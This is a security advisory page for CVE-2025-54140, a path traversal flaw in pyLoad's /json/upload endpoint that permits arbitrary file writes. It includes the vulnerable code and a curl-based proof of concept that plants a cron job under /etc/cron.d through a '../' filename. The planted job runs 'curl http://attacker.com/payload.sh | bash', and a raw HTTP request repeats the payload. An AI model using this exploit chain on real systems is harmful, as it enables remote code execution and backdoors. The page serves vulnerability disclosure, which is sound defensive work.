Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS14cXBnLTkyZnEtZ3JmZ84ABKWP

High EPSS: 0.00244% (0.47632 Percentile) EPSS:
Permalink JSON

`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write

Affected Packages Affected Versions Fixed Versions
pypi:pyload-ng = 0.5.0b3.dev89 0.5.0b3.dev90
1 Dependent packages
1 Dependent repositories
2,406 Downloads last month

Affected Version Ranges

All affected versions

All unaffected versions

Summary

An authenticated path traversal vulnerability exists in the /json/upload endpoint of the pyLoad By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to:

  • Remote Code Execution (RCE)
  • Local Privilege Escalation
  • System-wide compromise
  • Persistence and backdoors

Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        file_path = os.path.join(dir_path, "tmp_" + file.filename)  
        file.save(file_path)

Issue: No sanitization or validation on file.filename, allowing traversal via ../../ sequences.

(Proof of Concept)

  1. Clone and install pyLoad from source (pip install pyload-ng):
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
  1. Or install via pip (PyPi) in virtualenv:
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
  1. Login and obtain session token
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"
  1. Create malicious cron payload
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
  1. Upload file with path traversal filename
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
  1. On the next cron tick, a reverse shell or payload will be triggered.

BurpSuite HTTP Request

POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
References:

Identifiers

GHSA-xqpg-92fq-grfg

CVE-2025-54140

Risk

Severity

High

EPSS

EPSS Percentage: 0.00244

EPSS Percentile: 0.47632

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/pyload/pyload

Date and time

Published

8 days ago

Updated

6 days ago

API

JSON